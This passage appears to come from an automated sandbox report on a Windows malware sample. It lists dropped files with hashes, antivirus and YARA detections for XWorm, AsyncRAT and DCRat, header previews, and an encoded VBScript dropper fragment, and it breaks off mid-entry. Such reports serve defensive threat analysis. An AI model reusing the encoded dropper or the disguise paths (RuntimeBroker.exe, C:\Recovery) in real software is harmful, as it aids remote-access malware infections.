Preview:	CUIPy0qYtNGGSwqshVbnxXKUtDK4A8hfI6OIiIicBWGgggFU0dDasxyoJxgvpvXvpk8WhiJZw8laRnyM70Eh5HxUHk8umxwQ8U05iswSTnntMXXg9Txzr00ixnO7kZx9MVc6w2nOEwORdDHuMcuS97jIeSI5eys30oh15btHqiv4miFufevHoeAPvUbeusuPEUazfQzvtmlbLog6NXZ9DkPVoSFlAOX8xf0RHQPOo9YB3iDHxeQWSuMdFEKNLOvePnnqxOy7IKVDLNcFO8xf7ApCTXMCFCDaO4wP5XTjqTOIZJR1lF8NbPgO8kXaBv1GG5yRaNK1oNzowgnKFVb9D099XhQUA2h4bIBeU9aY5GiNa2cb7MVqU2CQ6z43601vq4MnfIzF4CE7RvifFzWxh1kjGvifFhbFOxgfpz6zXPvRyE8KQYyHeEOzUngukT9Xl8seOCzP2gZRFSvBwYPqtUlKjrLCSMPDQYqzWe5NjiO7o6tB1f7LETnRXi5g1w7qRVBqm6pSdBHKFofm8JLxOD96vYbxiYWwlhpT5DZ5zosDMcLtCSirlJbNWE5Ne1tEoUjh8Mr4tP7jU5uSNrvQzpLbGb60IMb75

C:\Program Files\Windows Photo Viewer\en-GB\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (385), with no line terminators
Category:	dropped
Size (bytes):	385
Entropy (8bit):	5.804371664903968
Encrypted:	false
SSDEEP:	6:ejpmQaVsTMB98P5+Rtjmdy6vAMyIvTAFVkG63Bcy/fKYB+UMHO/DhCNYihwDrejj:EIDVsTyr6bykTAFVSB7/fzg/hwy
MD5:	D841B65EDD0373C57B68E5B7AEA75ED5
SHA1:	BAD0157417E37974D2CF7324A95EB158B038B38B
SHA-256:	C951DF9149E3CB1D94F3BF2FEA73B744202D4FAC4846A5A8EFC8310DC5CE74D5
SHA-512:	84943824DFEF2B85DCB439F449D6786A3BCF596D5BA466D56C1ADE9F632F2F5A8F466520A50107D2E384123627A2CE9F2E444B3E01C8655D3F161CF3CBA8883A
Malicious:	false
Preview:	5ne9XFMNelKCgH5uITnQueFhLOdmINFGoTxHDA51zo9nFonXiYBDIgnai7yJlkFQfDYNTxrHYwaFfbbglGDtMB8HpWiFMwPPjtHCQZDur3oWFh5GfRhfgVEdFQh6Pl4mgLgvUZQLDTCSWlCHbck4OutNon7A2GfG9Cz4BJvFBWbNTvHdNZfwA9XwcTGrcPT7x5TUwIGRqe31Sf33gdwcksF9pDbsCEnvDeZXbwqETOGfGfe6ZNL8d0WF0UotqXOm1HyxGfbtxrJWlj2JjfSz3oSNIThHI7Y59eo9rqz4wbLvrAdQcfKLFZsMzlpw7TlzTNWH53c2pYDbdhgH0RpmxM0kvbJFAC6c0VbdnWUiCRfqWRtRFi6po8CHXwWdtW2nb

C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Templates\d908c538d2e8d0

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (840), with no line terminators
Category:	dropped
Size (bytes):	840
Entropy (8bit):	5.899287851191481
Encrypted:	false
SSDEEP:	24:8bYQ3wAGv76kRbrOWIHa84YbEmXh8CK9+l+MyewJoIwHvcV7FO:a3w/v76ErUHFtbHX8kzlwx/Bs
MD5:	EC2E060AE0BDF63F6DDE3806AFB2BB8B
SHA1:	9A813FEDB420B0F0E5DC2B72688320E718D647E6
SHA-256:	D0685220EB8D5F0BE9A4E032813617F46D01FE4EC9DF1B1820A57AE3B87D0BAC
SHA-512:	163B550BFD6A94B80DC7EA0E2EF24C6A3E2C812F1239A3CA65160922F6180F69384AE532DBB9F71823D77D9FD5532EB1878B7C2ACAD96DF21262BFCEDDEB4C18
Malicious:	false
Preview:	3lX1NiTQdDFdzb5Ij2gdx6fL7lHTKIGKEROFStrHNmCE3uyABcLKSDC6GL4maAGV74ZhNz00KYQL4bSMwGRr661BOR9GyEqNfrG8VQxMlV94x1Cp3s0UsYZADXT50uBFsCpNUU1fSFFk67OWPTNGOWeHRG5772W1U3LuMzVi1VBnSyEGJ6qgh41Vhh5OZ3hatOQDvdKZ8oP3V1ydCzyBMzTZC0Mo4HJ7xk4EiAUpvQh3p7AqtbLkEfO340A5Qff1eRFu7u5BeJP5RatEzg5c5j3RWAJrAZYQvqZX2Qs8gKF5QTleH6FujC54YyY6lNBFu9JkBVMjx76ud8BDYokDToqsve9E2vWSJAKQJAdvug6mGLaawUi6n7vGSbzgWHrBknkdyu4XLzTxrEmkDjRhNapMPD7sL6Ymz4Cdk7lBaKvyn8ZOyPdw0JyK8YOuwMMOar8wCIAF7QGDo0jRnt35dmvpG1fLt1OO8gY59mMpPXykCufHy7HDSQvy6SpKnyVGB2FHcoRAgNqFxLmVVXXwuL5rvj9r7CBbBsjKpYoKpGhFjqAupTyQbjWz6XW2pkDeLPDEmcq7tMGoo0HEjOBnNv9cWtNSBvfFCC3Un5INn1hOcsLFPSTajaQZPks3OY67rBll7xanGx9WOvAnhHCscEglvdFCNO8P4jhaGkIc1qUva4KekEVGVNenf9zdsYZ1yuboOjh79j1vtuL1SkcI224rF35GvpudQc6qdgQBhYHvVt3uy8KH5R860tjUnaLTzYfRyeXwUblduIVVALSwfmh9d90u66XGMx67Om6UkXwepeMrYNTcIYyM0fxynn0YDeQ6MYHY

C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\XClient.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\cf20f2cf4406ff

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (448), with no line terminators
Category:	dropped
Size (bytes):	448
Entropy (8bit):	5.832145273021852
Encrypted:	false
SSDEEP:	12:DLuHHtp65cBqEBwqOusV6lblNouJHfjRXn1X5CNps2nKDay:DyntwiBqXqOus6piGfjRlXMNps2Py
MD5:	D7AF488048FDEBBAAB7AA310C73ADB5B
SHA1:	56663EF8ABE1E14B5508E12911BBA42603C48AF4
SHA-256:	4BD5355AD4DD1BC4C925513B43D9E90FBF6A627BD5AE5248F7F20297DAEBC38D
SHA-512:	E7AB132853375C8AC93A9EE4F93EA41B88E9D05CB92C285222911B5B7DC685DFAE34606A4FD5E6FE7CF3BA0CF71BD5D77062DB40096B5E705B53B681C07F06DF
Malicious:	false
Preview:	w48bbYuuiDGln75THdiTU5iCPsjQridGWigpICXHCjrx2CRBCBLGorG1W5LtzdCAj9PEbQLFFbQvOuKNahNqXWboboTM1oRjgqN2xMkwzFBNaVnlu8TRPWmNhkmw78OaKrPhhSaN7b0RVOOGBrc2U9TJDAVMkxz01kDsFGDciFUygV2SWguPgVGKYFdh6NnJl9auLfA5n9UPpfnsHC0EDkTfe3UAmgfUcKMg5HH0fzlhA0e2buZ4XjGBq4PSLASHdAxeTHxA49iO8wenYci1Gl62EKzA1zpegdEAD9jU7Z9YA2C4Zm3sbbA1D4aIRwIEUErerekY2N4rmi1LH5kP66CEdM6IjbCLR5D6KiM5Bf0NhSPfCOAVL2IXBmBfibzbLtaqe5BjtpOaGyhK6aFUaq9Ywq5hgqXjqYCx2iAHNbmfosRMF1iHWeBetB4yAeCC

C:\Recovery\d908c538d2e8d0

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (662), with no line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.899444164976039
Encrypted:	false
SSDEEP:	12:iR9TsBxWwNIOI4M5fq06yGEWPguDA13zOH8otxyddofeu:4kxWCI9jOyGT4uDA1DOH9xUdofeu
MD5:	D6458947138A5918158670EC1B8EB45F
SHA1:	A51043A82FB1F0625CA64903102F14BFDEB00CD8
SHA-256:	4876F58C65C70C9597DB875D0A161BD5D47E24EA84FEE6F621F126FB112581C9
SHA-512:	47B73D80CE0782AD1C38FFF7034517F6A21CACFF80C466496C06D7B8F42C1488E3165D5B84F8217E6E3428B18565B696136E417B603D0F217934F2529B247BE2
Malicious:	false
Preview:	sobJTIs2nONxKDrZ2zezB5f9U2jBizCCtwkTv5KTygMwu9ihRsXqFknxIczbiqTyLLEYcYn7oLBfssOVUCtzcW7JJwKTGtuHMYlj5KE3FZC4jHFaNeHg7dVzN5OqNU14a3TUHoaJ80uCUDjCruFlmOKtCvW96YquiHdpyuSjE7iHsSfKVM8dPPSMtjRVSaNjJAeMk4N6bfhoqDAuQMotZMfTyR6Od6Rou87sySkb8CBtrofqjhFGvdK7fKYS79dfO34sGR58mNvWLvlKvPo61K2QxANo4Rd8jgeytxkSmGeisxvtiNhrUgnEAo4GEREUtwxpRxa8pWUuqUhAOdFquvoC2axF2eNUCJy69GcvxjC8M3XqG41kMYk8Ivx0AVFLI9shflAIBT3Ltpz9CG98mnIoi0xOTlvbd00NK0Le4tj2eZOc6xy3VGjf0D8pyvyaibr3zlyM5eD2DQJJlVSfx1FWQUXG1gqI4JTDsVnU9l81Cqbj4yDcdTmrVUmeNrUZy5847GbQs7fL3OUk3xMDcNolgmrXsIGSQiCHsgmyXwugybyGABlZeR6lQXYVYDhk0N4UMM2WLYpqcIwFxlXrgrx9mb0UIRaTOKqkgd4xJPOGlPIIkShwq0DJZ5ruVhN47WbRbMjTqjhQcrXWTsu0tn

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ServerWeb.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
MD5:	5D3E8414C47C0F4A064FA0043789EC3E
SHA1:	CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
SHA-256:	4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
SHA-512:	74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\conhost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3880844
Entropy (8bit):	7.7455500264939205
Encrypted:	false
SSDEEP:	49152:tbA3wvcdwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9iD:tbOXZHEwTUzcvtpzh2xKbepZrs
MD5:	95D7FC6FAA389C5751DE5C2F88D9580B
SHA1:	E6E7D542E3EC916464B77103B04E7F1722FE9A84
SHA-256:	A388D9B021EC9BE1B20504D4673AC3388B64255B6B073BD4D3F348524B3E888B
SHA-512:	C1B5D1EA1513225D1898EEDB0344E08818703CCBD07F366970338CF83998DC32CF372D0367E6C128B356045A2C79164B8C17031BE21553FEBF4DA79EF7766FA2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@.......................................@......................... ...4...T...<....0.......................P..h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h"...P...$..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe

Download File

Process:	C:\Users\user\Desktop\ywXeiXEvP2.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4012544
Entropy (8bit):	7.727131196942866
Encrypted:	false
SSDEEP:	49152:bSbA3wvcdwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9Q:+bOXZHEwTUzcvtpzh2xKbepZro
MD5:	57D593692C8428B66ED146E1FAC689B7
SHA1:	E9318D78EFD4639D510ED9F39C8C3FCA74BA9E14
SHA-256:	9A75E3D28B75744CE468224B00CA5CAEDD73DF7F71C797DF2CBEE2E9AC2D9A81
SHA-512:	49293771DC734CA8802B0B9B8F61E77294819AB00983F5BB4F12205965E44ABE2B5E5EAD3DDF24FC8B5AB5392884B1422995C8B1E54B64FB693FCF3A50518F32
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*....................."=...... .......0....@...........................=..................@...........................P............=..................................................p......................................................CODE................................ ..`DATA....\|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.reloc............... ..............@..P.rsrc.....=.......=.."..............@..P.....................$..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\XClient.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.5792271146909735
Encrypted:	false
SSDEEP:	384:OLxpXSqGWjxaAiQcamYpnnGnRLGVYCwvHixdTD2VR8pkFTBLTIZwYGDcvw9Ikuia:6XNcaZodYYC4CaV9FZ9jcOjhB/45
MD5:	1BE2B217087429A8397F448C9C7B8F8D
SHA1:	4507E83E00CC18D738452D9217F4DFA19CA9D2DE
SHA-256:	D4482CA83D2A2DBD011C63739477E90893728AF1A0B4E5FBC6413009573F7702
SHA-512:	8588A0EFAF8D857D773E5947D2EE7599559C1BDB139B5E28030E02ACA6B93C0291BA80616BA06B3A96E50059D829B233CBF854EF807AA313CF8E7890613B8922
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[af.................~............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....}... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B.......................H........Q...J............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	239
Entropy (8bit):	5.874652570260906
Encrypted:	false
SSDEEP:	6:Gbt2wqK+NkLzWbHo18nZNDd3RL1wQJRZ7CvdhtMGoIRP:GxMCzWLo14d3XBJr7weG5
MD5:	CD2394B62B0E45E8F0FE6574406B69E4
SHA1:	F85F70C37BB54FF9274F83B899F3127774687DDF
SHA-256:	EC38AAA0DE9073F8FAA3FEEAA3184C86162623F207331CD59E4CAD94A68F4048
SHA-512:	D4CA9529DBA04F0C19FD3AE2E3DD5B6E8292B87634168F26AD8D3CDDFD63973DDAB38E6F7AA393B6CAB3C52B3E6D5360D07DE8E5262BF064E09A64A608CF9058
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^1gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vGT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]z_XanD1WUYmkUnMmWs2W.+xDUnY1Ws:Gx&4`;H3T(H7GUeycjen.\|T+Dsc4CDJBP!BP6CVk+f0YAAA==^#~@.

C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.124083797069061
Encrypted:	false
SSDEEP:	3:LlzRWDNMSdn:PWbn
MD5:	677CC4360477C72CB0CE00406A949C61
SHA1:	B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
SHA-256:	F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
SHA-512:	7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
Malicious:	false
Preview:	MsgBox "TestDefault, Message!", 64

C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.009104760931058
Encrypted:	false
